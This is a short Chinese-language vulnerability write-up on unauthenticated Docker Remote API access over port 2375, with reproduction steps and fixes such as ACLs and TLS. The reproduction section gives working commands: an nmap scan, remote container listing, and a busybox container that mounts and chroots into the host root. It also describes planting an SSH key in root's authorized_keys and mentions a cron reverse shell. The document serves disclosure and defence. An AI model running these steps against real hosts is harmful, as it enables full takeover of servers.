【漏洞修复】Docker remote api未授权访问复现和修复

0x01漏洞描述

Docker是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的容器中，然后发布到任何流行的LINUX机器上，也可以实现虚拟化。Docker swarm 是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展，由docker官方提供。

在使用docker swarm的时候，管理的docker 节点上会开放一个TCP端口2375，绑定在0.0.0.0上，http访问会返回 404 page not found ，其实这是 Docker Remote API，可以执行docker命令，比如访问 http://host:2375/containers/json 会返回服务器当前运行的 container列表，和在docker CLI上执行 docker ps的效果一样，其他操作比如创建/删除container，拉取image等操作也都可以通过API调用完成，

0x02 漏洞危害

Docker daemon api是使用url代替命令行来操作docker，docker swarm 是docker下的集群管理工具，在开放2375端口来监听集群容器时，会调用这个api，可以执行docker命令，root权限启动docker情况下可直接可以控制服务器。

0x03 漏洞验证

1、nmap探测开放的docker

nmap -p 2375 x.x.x.x 

2、使用-H参数连接目标主机的docker，使用ps命令查询目标系统运行的镜像。

docker -H tcp://x.x.x.x:2375 ps

3、使用docker命令创建一个busybox容器，并将宿主机的磁盘挂载到容器中。

docker -H tcp://1x.x.x.x:2375 run -it -v /:/mnt busybox chroot /mnt sh

4、在vps上生成公钥，并将其写入到目标机器宿主机的/root/.ssh/authorized_keys文件中，即可直接免密登录目标机器

其他方式：利用定时任务反弹shell

0x04 修复建议

1、简单粗暴的方法，对2375端口做网络访问控制，如ACL控制，或者访问规则；

2、修改docker swarm的认证方式，使用TLS认证：Overview Swarm with TLS 和 Configure Docker Swarm for TLS这两篇文档，说的是配置好TLS后，Docker CLI 在发送命令到docker daemon之前，会首先发送它的证书，如果证书是由daemon信任的CA所签名的，才可以继续执行。